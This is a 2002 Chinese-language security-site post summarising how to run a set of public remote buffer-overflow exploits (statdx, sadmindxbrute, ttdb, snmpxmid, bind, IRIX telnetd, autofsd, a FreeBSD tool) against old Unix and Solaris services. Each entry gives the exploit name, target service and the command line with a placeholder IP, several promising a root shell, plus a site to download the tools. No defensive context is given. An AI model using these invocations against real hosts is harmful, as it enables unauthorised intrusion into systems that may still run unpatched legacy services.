远程溢出总结

		当前位置：主页>安全文章>文章资料>漏洞资料>文章内容

远程溢出总结

来源：vittersafe.tk 作者：vitter 发布时间：2002-08-29

　远程溢出总结
呵呵！用unix古老的远程溢出可算比较的多了！
下边我列出几个长用的远程溢出的exploit的用法！
目标主机一律用128.0.0.1代替！
1 statdu[vdp]redhat6.xrpc status远程溢出！
溢出程序：
statdx
用法：./statdx -d 0 128.0.0.1或者
./statdx -d 1 128.0.0.1或者
./statdx -d 2 128.0.0.1或者
2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出

溢出程序：
sadmindxbrute
用法
./sadmindxbrute (主机类型参数) 128.0.0.1
主机参数
1 x86 2.6
2 x86 7.0
3 sparc 2.6
4 sparc 7.0

3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出
所用程序
ttds（已经改名）流光iv的exploit内可以找到
用法
./ttds 128.0.0.1 80（攻击断口设置为80）-v6

4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出
所用程序
snmpxmid
用法：
./snmpxmid 128.0.0.1 -v 7
5 bind 远程溢出
程序bind
用法
./bind 128.0.0.1 -e
6 irix的telnet远程溢出（这个可能用流光iv扫描不到）
所用程序telnetd
用法
./telnetd 128.0.0.1
7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell
所用程序
utofsd
用法：./utofsd 128.0.0.1
8 freebsd远程溢出
这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法
bsd 128.0.0.1
其他的远程溢出程序也不麻烦
你只要把程序编译好之后输入
./程序名 --h就可以看到帮助了！
以上所用的脚本均可以在www.hack.co.za下载到！

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统致命漏洞。
·南方数据企业网站管理系统V10.0
·动网（DVBBS）Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码，常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day

推荐广告